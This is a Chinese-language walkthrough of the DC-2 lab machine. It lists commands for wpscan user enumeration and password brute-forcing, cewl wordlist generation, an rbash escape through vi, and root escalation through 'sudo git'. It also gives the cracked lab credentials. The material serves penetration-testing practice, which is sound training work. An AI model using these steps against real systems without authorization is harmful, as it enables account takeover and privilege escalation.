靶机 DC-2

DC_2

信息搜集

存活检测

详细扫描

添加 host

后台网页扫描

网页信息搜集

• 主页面

  找到 flag1，提示使用 cewl 密码生成工具

  

• wp 登陆界面

  

• 使用 wpscan 扫描用户

  wpscan --url http://dc-2/ --enumerate u 
  

  扫描出用户 tom、jerry、admin

  

• 将三个用户名写入文件中以供密码爆破

  

• 根据网页信息生成密码字典

  cewl http://dc-2/ -w mima.txt
  

  

• 爆破

  wpscan --url http://dc-2/ --passwords mima.txt --usernames username
  

• 成功爆破出 tom 和 jerry 的密码

  jerry,adipiscing
  tom,parturient
  

  

• 网页登录

  

• flag2

  

  

  提示可以使用其他方法

ssh 登录

• 使用之前爆破出的账密

  尝试 jerry

  

  登陆失败

• 尝试 tom

  

  成功登录

• 找到第三个 flag，但查看时显示被 rbash 限制

  

  rbash（Restricted Bash）是一种受限制的交互式 shell，它是 Bash shell 的一个变种。rbash 提供了一种限制用户的能力，以便他们只能在受限的环境中执行特定的操作

• 查看可以使用的命令

  compgen -c
  

  

• 发现可以使用 vi 命令

  

• 尝试使用 vi 命令查看 flag3

  

  提示 tom 使用 su

• su

  

  还是被限制

部分提权

• rbash 绕过

  # vi进入末行之后
  :set shell=/bin/bash
  :shell
   
  # 切换完成之后还要添加环境变量。给$PATH变量增加两个路径，用来查找命令
  export PATH=$PATH:/bin/
  export PATH=$PATH:/usr/bin/
  

  

• 切换 jerry 用户

  成功切换

  

• jerry 家目录下拿到第四个 flag

  

  提示 git

提权

• sudo -l 查看权限

  

• [git 提权](git | GTFOBins)

  sudo git -p help config
  !/bin/sh
  

  

  成功 root

• final-flag

  

总结

• wpscan 扫描用户名、爆破
• cewl 根据网页搜集密码
• rbash 绕过
• git 提权